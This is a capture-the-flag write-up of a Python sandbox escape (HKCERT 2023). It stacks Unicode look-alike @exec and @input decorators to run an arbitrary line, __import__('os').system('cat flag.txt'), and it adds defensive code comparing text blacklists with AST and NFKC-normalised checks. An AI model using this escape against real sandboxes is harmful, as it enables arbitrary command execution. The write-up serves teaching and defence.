In this challenge, we are tasked with bypassing a Python sandbox that restricts certain function calls, such as exec and __import__, through AST (Abstract Syntax Tree) transformations. The goal is to execute system commands despite these restrictions.
The sandbox blocks certain calls (such as exec, __import__, and input) by analyzing the Python code's AST. Decorators (such as @exec and @input) aren't always treated the same way as ordinary calls and may bypass the restrictions. By applying @exec and @input as decorators to a class definition, we can indirectly execute the system command without triggering the sandbox's AST filters. By spelling exec and input with Unicode look-alike characters, we can bypass the blacklist because these characters look like the restricted keywords but are different enough to be accepted.
Payload:
We use Unicode characters to replace exec and input:
@exec
@input
class X:
    pass
When we run this, the sandbox doesn’t block the decorators because they are non-ASCII. Then, we input the payload:
__import__("os").system("cat flag.txt")
Why It Works:
With the two decorators stacked, the class X is first passed to the input function, which reads the line we type next (our payload), and exec then runs that line as code. Because the decorator names are Unicode look-alikes, they bypass the usual AST filters, and the system command runs.
# Step 1: Use Unicode decorators to bypass the sandbox
@exec
@input
class X:
    pass
# Step 2: Input the payload to execute the system command
>>> __import__("os").system("cat flag.txt")
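The challenge's actual filter code is not shown on this page, so the following is an added example (not the challenge's or the writeup author's code) illustrating the defender's side of the same issue: a blacklist applied to the raw source text never sees the ASCII words when the identifiers are spelled with fullwidth look-alikes, whereas CPython normalises identifiers to NFKC while parsing, so a check on the parsed AST (or on NFKC-normalised text) sees plain exec and input again. The blacklist, the fullwidth sample source and the function names are assumptions constructed for the example.

```python
import ast
import unicodedata

# Hypothetical blacklist; the challenge's real list is not on the page.
BLACKLIST = {"exec", "eval", "__import__", "input"}

# Constructed sample: decorator names spelled with fullwidth Latin letters
# (U+FF41..U+FF5A), which look like "exec" / "input" but are different code points.
HOMOGLYPH_SRC = (
    "@\uff45\uff58\uff45\uff43\n"        # @ｅｘｅｃ
    "@\uff49\uff4e\uff50\uff55\uff54\n"  # @ｉｎｐｕｔ
    "class X:\n    pass\n"
)
PLAIN_SRC = "@exec\n@input\nclass X:\n    pass\n"


def naive_text_check(src: str) -> bool:
    """Weak filter: substring search on the raw source text.
    Look-alike identifiers do not contain the ASCII words, so this misses them."""
    return any(word in src for word in BLACKLIST)


def decorator_names(src: str) -> list:
    """Return the identifiers the parser sees on every decorator in the source.
    CPython applies NFKC normalisation to identifiers while parsing (PEP 3131),
    so the fullwidth spellings come back as plain 'exec' and 'input'."""
    names = []
    for node in ast.walk(ast.parse(src)):
        for deco in getattr(node, "decorator_list", []):
            if isinstance(deco, ast.Name):
                names.append(deco.id)
    return names


def ast_name_check(src: str) -> bool:
    """Stronger filter: inspect ast.Name / ast.Attribute nodes after parsing.
    This covers decorators, calls and bare references, all with normalised names."""
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Name) and node.id in BLACKLIST:
            return True
        if isinstance(node, ast.Attribute) and node.attr in BLACKLIST:
            return True
    return False


def normalized_text_check(src: str) -> bool:
    """Fix for text-based filters: normalise the source to NFKC first, so the
    check sees the same spelling the parser will."""
    return naive_text_check(unicodedata.normalize("NFKC", src))
```

Running the checks on HOMOGLYPH_SRC shows naive_text_check returning False while decorator_names returns ["exec", "input"] and both normalised checks return True.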
For more details about this challenge, you can visit the official GitHub page of the challenge:
hkcert-ctf-2023-challenges/45-secure-python2 at master · blackb6a/hkcert-ctf-2023-challenges